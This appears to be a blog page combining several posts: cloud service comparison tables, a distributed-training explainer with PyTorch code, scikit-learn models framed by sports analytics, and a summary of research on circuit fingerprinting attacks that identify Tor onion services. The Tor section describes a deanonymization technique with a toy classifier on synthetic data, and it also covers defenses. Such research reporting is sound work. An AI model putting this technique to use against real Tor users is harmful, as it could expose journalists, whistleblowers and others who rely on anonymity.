CI/CD Tools | CodePipeline, CodeBuild | Azure DevOps, GitHub Actions | Cloud Build
Infrastructure as Code | CloudFormation, CDK | Bicep, ARM Templates | Deployment Manager, Terraform
Monitoring | CloudWatch | Azure Monitor | Cloud Monitoring

AI & Machine Learning Platforms

If you're building smart apps, here's what each platform offers:

Category | AWS | Azure | GCP
ML Platform | SageMaker | Azure Machine Learning | Vertex AI
Pretrained Services | Bedrock, Rekognition | Azure AI (Vision, Speech) | Cloud Vision, Dialogflow
Chatbot/AI Support | Lex, Bedrock | Azure Bot Service, OpenAI | Dialogflow, Gemini Pro API

Security and Compliance

All major providers meet global compliance standards (ISO, GDPR, HIPAA, SOC 2), and offer identity and access tools like:

  • AWS IAM, GuardDuty

  • Azure Active Directory, Sentinel

  • GCP IAM, Security Command Center

Which One Should You Choose?

  • Go with AWS if you want a vast ecosystem and battle-tested tools for nearly every use case.

  • Choose Azure if you're in a Microsoft environment or working on hybrid/on-premises integrations.

  • Use GCP for AI-heavy applications, analytics, or Kubernetes-centric development.


 

Comparison of Key Cloud Services & Tools (AWS, Azure, GCP)

Serverless Compute

Feature | AWS | Azure | Google Cloud (GCP)
Serverless Functions | AWS Lambda | Azure Functions | Cloud Functions
Container-based Serverless | AWS Fargate | Azure Container Apps | Cloud Run
Event Management | Amazon EventBridge, SNS | Azure Event Grid, Service Bus | Eventarc, Pub/Sub

Virtual Machines & Orchestration

Feature | AWS | Azure | GCP
Virtual Machines | Amazon EC2 | Azure Virtual Machines | Compute Engine
Autoscaling | Auto Scaling Groups | Virtual Machine Scale Sets | Instance Groups
Container Orchestration | ECS / EKS (Kubernetes) | AKS (Azure Kubernetes Service) | GKE (Google Kubernetes Engine)

DevOps & CI/CD Tools

Feature | AWS | Azure | GCP
CI/CD Pipelines | CodePipeline, CodeBuild | Azure DevOps, GitHub Actions | Cloud Build
Infrastructure as Code | CloudFormation, CDK | Azure Bicep, ARM Templates | Deployment Manager, Terraform
Monitoring & Logging | CloudWatch, CloudTrail | Azure Monitor, Log Analytics | Cloud Logging, Cloud Monitoring

API & Integration Tools

Feature | AWS | Azure | GCP
API Gateway | Amazon API Gateway | Azure API Management | API Gateway
Workflow Automation | AWS Step Functions | Azure Logic Apps, Durable Functions | Workflows

Artificial Intelligence & Machine Learning

Feature | AWS | Azure | GCP
ML Platform | Amazon SageMaker | Azure Machine Learning | Vertex AI
Pretrained AI Services | Bedrock, Rekognition, Polly | Azure Cognitive Services, OpenAI | Cloud Vision, Natural Language
Conversational AI | Lex (Chatbots) | Azure Bot Service, OpenAI | Dialogflow

Developer Tools & SDKs

Feature | AWS | Azure | GCP
Command Line Tool | AWS CLI | Azure CLI | gcloud CLI
SDKs & APIs | AWS SDK (Java, Python, JS, etc.) | Azure SDKs | Google Cloud Client Libraries
Dev Portals | AWS Cloud9, CloudShell | Azure Cloud Shell, Visual Studio | Cloud Shell, Cloud Code

Hybrid & Edge Computing

Feature | AWS | Azure | GCP
Hybrid Solutions | AWS Outposts, Local Zones | Azure Arc, Stack HCI | Anthos
IoT Services | AWS IoT Core | Azure IoT Hub | Cloud IoT Core (retired in 2023)



What Is Distributed Training and Why It Matters in AI

In the world of artificial intelligence and machine learning, training models often requires massive computational power-especially when dealing with very large datasets or highly complex algorithms. In such cases, a single machine may not be enough. This is where distributed training comes in.

What Is Distributed Training?

Distributed training is the practice of spreading the computational workload of training a model across multiple compute resources, such as CPUs, GPUs, or entire nodes in a cluster. Rather than relying on one machine to handle everything, multiple machines or devices collaborate in parallel to speed up and scale the process.

There are two main strategies in distributed training:

1. Data Parallel Training

In data parallel training, the dataset is split into smaller chunks, and each chunk is processed by a different compute node. Every node trains a copy of the same model on its subset of data. After each training step, the model parameters (weights and biases) are synchronized across all nodes to keep them consistent.

Practical example: Suppose you're training a facial recognition model on millions of images. In data parallel training, each GPU processes a different batch of images using the same model, and after each iteration, they all update and sync their learned weights.
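A condensed PyTorch sketch of the data parallel idea (assuming one GPU per process and a launcher such as torchrun setting the rank/world-size environment variables; the model and batch are placeholders):

import torch
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel as DDP

dist.init_process_group("nccl")           # one process per GPU
rank = dist.get_rank()

model = torch.nn.Linear(128, 2).to(rank)  # the same model is replicated on every GPU
model = DDP(model, device_ids=[rank])     # gradients are synchronized automatically

optimizer = torch.optim.SGD(model.parameters(), lr=0.01)
loss_fn = torch.nn.CrossEntropyLoss()

# Each rank would see a different shard of the data (placeholder batch here)
inputs = torch.randn(32, 128).to(rank)
labels = torch.randint(0, 2, (32,)).to(rank)

optimizer.zero_grad()
loss = loss_fn(model(inputs), labels)
loss.backward()                           # all-reduce keeps weights consistent across nodes
optimizer.step()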

2. Model Parallel Training

In model parallel training, instead of splitting the data, the model itself is divided across multiple compute nodes. This is useful when the model is too large to fit into the memory of a single machine-even if the dataset isn't huge.

Practical example: For very large language models (like GPT), you might split the architecture into layers and assign each layer to a different GPU. The model is trained in sequence, but computation is distributed across devices.
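And a minimal sketch of the model parallel idea, with two layers pinned to two hypothetical GPUs; the activations move between devices during the forward pass, not the whole model:

import torch
import torch.nn as nn

class TwoDeviceModel(nn.Module):
    def __init__(self):
        super().__init__()
        # Each part of the model lives on a different GPU
        self.part1 = nn.Linear(1024, 512).to("cuda:0")
        self.part2 = nn.Linear(512, 10).to("cuda:1")

    def forward(self, x):
        x = torch.relu(self.part1(x.to("cuda:0")))
        return self.part2(x.to("cuda:1"))

model = TwoDeviceModel()
out = model(torch.randn(8, 1024))
print(out.shape)  # torch.Size([8, 10])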

Why Distributed Training Matters

  • Speed: It accelerates training by reducing the time needed per epoch.

  • Scalability: It makes it possible to handle massive datasets and model architectures that are otherwise unmanageable.

  • Flexibility: It allows the use of diverse hardware infrastructures, including cloud platforms and on-premise clusters.

Challenges of Distributed Training

Despite its advantages, distributed training introduces some challenges:

  • Communication overhead: Synchronizing parameters across nodes can slow things down if not managed efficiently.

  • Fault tolerance: The more machines involved, the greater the chance of a failure during training.

  • Load balancing: Dividing tasks evenly among resources is not always straightforward.

Distributed training is a vital technique for building more powerful and intelligent machine learning systems. Whether you're splitting data (data parallel) or splitting models (model parallel), this approach helps overcome the computational limitations of single machines, making large-scale AI training feasible and efficient.

If you're working with deep learning or looking to scale up your AI projects, understanding distributed training is a crucial step in staying ahead.

Understanding Machine Learning Models Through the Lens of Sports Analytics

1. Logistic Regression – The Basics of Prediction

Logistic regression is often a starting point for classification problems. It's simple, efficient, and surprisingly powerful for many use cases.

Sports Example:

Predicting whether a player will score in a match based on features like shot accuracy, number of attempts, and position on the field.

from sklearn.linear_model import LogisticRegression

clf = LogisticRegression().fit(df[["num", "amount"]], df["target"])
clf.score(df[["num", "amount"]], df["target"])

With just a few lines of code, you’re ready to predict and evaluate performance. Thanks to Scikit-learn’s consistent API, this process remains the same across different models — a huge advantage for fast-paced analytics.

2. Decision Trees – Game Strategy Made Visual

Decision trees resemble the decision-making process coaches use during a match. They split data based on key features — like player stamina or match tempo — and guide you down a path of logic to make a prediction.

Sports Example:

Deciding whether to substitute a player based on current performance stats and fatigue level.

  • Easy to interpret: You can visualize the logic.

  • Flexible: Used for both classification and regression.

  • Automatic feature selection: Trees pick the most important stats to split on.

3. Random Forests – The Team Effort Approach

Random forests are like building a dream team of decision trees. Instead of relying on a single model, you train many trees on random subsets of your data and features. Each tree “votes,” and the majority wins.

Sports Example:

Predicting injury risk using a combination of training data, match stats, and player history.

from sklearn.ensemble import RandomForestClassifier

clf = RandomForestClassifier().fit(df[["num", "amount"]], df["target"])
clf.score(df[["num", "amount"]], df["target"])

Random forests provide excellent accuracy and handle noise in your dataset much better than a single tree.

4. Hierarchical Clustering – Grouping Similar Athletes

Unlike the previous models, hierarchical clustering is unsupervised. That means it finds patterns in your data without needing a target label.

Sports Example:

Grouping athletes with similar training behaviors, body metrics, or play styles to tailor training plans.

It builds clusters based on distances (e.g., Euclidean or Manhattan), forming a tree-like structure where similar data points are grouped together.
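A small scikit-learn sketch with made-up athlete metrics (three clusters assumed purely for illustration):

import numpy as np
from sklearn.cluster import AgglomerativeClustering

# Columns: weekly training hours, average sprint speed (invented values)
athletes = np.array([
    [12, 30], [11, 31], [13, 29],   # endurance-focused profiles
    [5, 36],  [6, 35],              # sprint-focused profiles
    [9, 33],  [8, 32],              # mixed profiles
])

labels = AgglomerativeClustering(n_clusters=3).fit_predict(athletes)
print(labels)  # athletes with similar profiles share a cluster label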

5. Feature Selection – Focus on What Matters Most

Tree-based models have another superpower: automatic feature ranking. The higher a feature appears in a decision tree, the more important it is. This helps reduce noise and improve model speed and clarity.

Sports Example:

Out of dozens of player metrics, identifying which 3–4 truly impact performance helps coaches focus their efforts.
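With a fitted tree-based model, that ranking is available directly. A sketch with a tiny made-up dataset, reusing the column names from the earlier snippets:

import pandas as pd
from sklearn.ensemble import RandomForestClassifier

# Invented player metrics and a binary outcome
df = pd.DataFrame({
    "num":    [3, 7, 2, 9, 4, 8, 1, 6],
    "amount": [10, 40, 15, 55, 20, 50, 5, 35],
    "target": [0, 1, 0, 1, 0, 1, 0, 1],
})

clf = RandomForestClassifier(random_state=0).fit(df[["num", "amount"]], df["target"])

# feature_importances_ ranks the metrics the trees split on most
for name, score in zip(["num", "amount"], clf.feature_importances_):
    print(f"{name}: {score:.2f}")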

Why Scikit-learn is a Game-Changer for Sports Analytics

Scikit-learn is the MVP of ML libraries — especially for sports analysts new to the game.

Standard API for All Models

No matter what algorithm you use, the pattern remains the same:

model.fit(X_train, y_train)
predictions = model.predict(X_test)

Switching from random forests to logistic regression? No need to rewrite your whole script.

What Happens Outside of Scikit-learn?

Other libraries like PyTorch and raw XGBoost are powerful, but they require custom training loops and data formats. This complexity can slow you down — especially when you're working with fast-changing sports data.

However, even these libraries offer Scikit-learn-compatible wrappers. With tools like XGBClassifier, you keep the simplicity while leveraging more advanced models.
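For example, the scikit-learn-compatible wrapper from the xgboost package (assuming xgboost is installed) drops into the same fit/predict pattern:

from xgboost import XGBClassifier
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split

X, y = make_classification(n_samples=200, n_features=5, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

model = XGBClassifier(n_estimators=100)
model.fit(X_train, y_train)          # same API as any scikit-learn estimator
print(model.score(X_test, y_test))   # accuracy on the held-out split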

Picking the Right Model for the Right Play

Here’s how these models stack up in sports:

Model | Best For | Example Use Case
Logistic Regression | Simple binary classification | Predicting win/loss
Decision Trees | Interpretability, quick decision rules | Tactical decisions during games
Random Forests | High accuracy, robustness | Injury prediction, performance classification
Hierarchical Clustering | Unsupervised grouping | Grouping similar players or training types

Outsmarting Digital Defenders: How Tor’s Transport Tactics and Fingerprint Attacks Shape the Anonymity Game

In the world of sport, every move is tactical. A team that wins doesn't just rely on power — it relies on strategy, disguise, and flexibility. The same holds true in the world of online anonymity.

Just like athletes dodging defenders, Tor Browser helps users avoid censorship and surveillance. But even with clever tactics like pluggable transports and dummy traffic, powerful adversaries are still trying to read the playbook. A 2022 scientific study reveals that despite Tor’s latest defenses, onion services remain vulnerable to fingerprinting attacks that can potentially deanonymize them.

This post explores how Tor fights censorship like a well-drilled sports team — and how new research shows there are still weaknesses on the field.

How Tor Uses Pluggable Transports

To access the open internet under surveillance, Tor uses multiple relays to create encrypted circuits — like passing a ball through trusted teammates. But in heavily censored countries, even the use of Tor itself can get blocked.

That’s where pluggable transports come in. These are like camouflage uniforms for Tor traffic, helping users hide in plain sight.

obfs4 – The Agile Dribbler

  • Disguise: Makes traffic look like random noise.

  • Use case: Light to moderate censorship environments.

  • Weakness: Can be detected by active probing.

  • According to a 2022 study, obfs4 can still leak metadata that allows for circuit classification — especially when not combined with other obfuscation.

Snowflake – The Swarm Tactician

  • Disguise: Routes traffic through thousands of ephemeral proxies, like peer-to-peer video calls.

  • Use case: Adaptive censorship environments (e.g. Russia).

  • Strength: Very hard to block due to rotating volunteers.

  • The ScienceDirect paper didn’t target Snowflake directly, but its architecture avoids many traditional fingerprinting points.

meek-azure – The Corporate Impersonator

  • Disguise: Makes it look like you're accessing Microsoft services.

  • Use case: High-censorship countries (e.g. China, Iran).

  • Trade-off: Very slow, resource-heavy.

  • The paper suggests that even under padding, some meek-azure circuits may be fingerprinted — especially if the traffic direction and size patterns are observable.

These transports help get around censorship — but as the new research shows, even once you're inside the Tor network, not all is safe.

Circuit Fingerprinting Attacks on Onion Services

A recent peer-reviewed study titled “Discovering Onion Services Through Circuit Fingerprinting Attacks” (published in Computer Networks, 2022) reveals a potent method for identifying onion services — even when they are protected by modern Tor defenses like WTF-PAD.

What’s the Attack?

The researchers used a machine learning-based technique called circuit fingerprinting to analyze how traffic moves across the Tor network. They didn’t need to decrypt anything — they just analyzed packet direction, timing, and size.

Their innovation: Instead of trying to identify the type of circuit (like previous methods), they focused only on who created the circuit:

  • A client

  • Or an onion service
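The classification step itself is ordinary supervised learning over circuit metadata. The toy sketch below uses entirely synthetic features (packet count, direction ratio, timing) invented for illustration; it is not the paper's dataset, feature set, or pipeline:

import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)

def synthetic_circuits(n, onion):
    # Toy features: packets observed, fraction outgoing, mean inter-packet time.
    # The distributions are made up purely to show the workflow.
    base = [60, 0.45, 0.08] if onion else [40, 0.60, 0.05]
    X = rng.normal(base, [10, 0.05, 0.02], size=(n, 3))
    y = np.full(n, int(onion))
    return X, y

Xc, yc = synthetic_circuits(500, onion=False)  # client-created circuits
Xo, yo = synthetic_circuits(500, onion=True)   # onion-service circuits
X = np.vstack([Xc, Xo])
y = np.concatenate([yc, yo])

X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf = RandomForestClassifier(random_state=0).fit(X_train, y_train)
print(f"accuracy on synthetic data: {clf.score(X_test, y_test):.2f}")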

Experimental Setup

  • Simulated Network: They used the Shadow simulator with a modified Tor codebase.

  • Data: Collected traffic from client and onion service circuits.

  • Algorithms: Tested SVM, Random Forest, and XGBoost models.

  • Defenses: Tested with and without WTF-PAD and padding machines enabled.

Precision That Breaks Anonymity

Classifier | Precision | Recall
Random Forest | 99.99% | 99.99%
XGBoost | 99.99% | 99.99%
SVM | Slightly lower | Slightly lower

Even with identical application-layer traffic and padding active, the model could accurately identify onion service circuits. That means malicious relays could potentially identify Tor hidden services based only on circuit-level metadata.

Real-World Implications

This study changes the way we think about Tor’s anonymity guarantees:

  • Padding Isn’t Enough: Even with defensive padding, unique patterns in traffic direction and volume remain detectable.

  • Relay Adversaries Are Dangerous: Anyone running a guard or middle relay could gather data for fingerprinting.

  • Onion Services Are Traceable: Hidden services aren’t as hidden as once thought — especially if the attacker already suspects their presence.

If you're hosting a sensitive service on Tor — from journalism to whistleblowing — this threat is very real.

What's the Defense?

The authors suggest that Tor must evolve its padding techniques to hide more than just the beginning of a circuit. Some ideas include:

  • More randomized packet sizes and timing

  • Blurring directional flow during early communication

  • Circuit-level traffic normalization to mask origin patterns

For now, users should use transports like Snowflake or meek-azure when in high-risk regions and follow best practices for hidden service deployment (e.g., moving between bridges, rotating addresses, disabling JavaScript, etc.).

Privacy Is a Tactical Game

Much like a championship game, online anonymity is not won in one move. It’s a contest of evolving strategies. Tor’s pluggable transports are its offense — trying to bypass censorship — while fingerprinting attacks are the defense trying to intercept and reveal users.

The study proves that even elite tactics like WTF-PAD are not a guarantee of privacy. If you want to win the long game for anonymity, constant research, adaptation, and awareness are required — both by developers and by users.


🔗 Scientific Article: Discovering Onion Services through Circuit Fingerprinting Attacks (ScienceDirect, 2022)

🔗 Tor Project – Pluggable Transports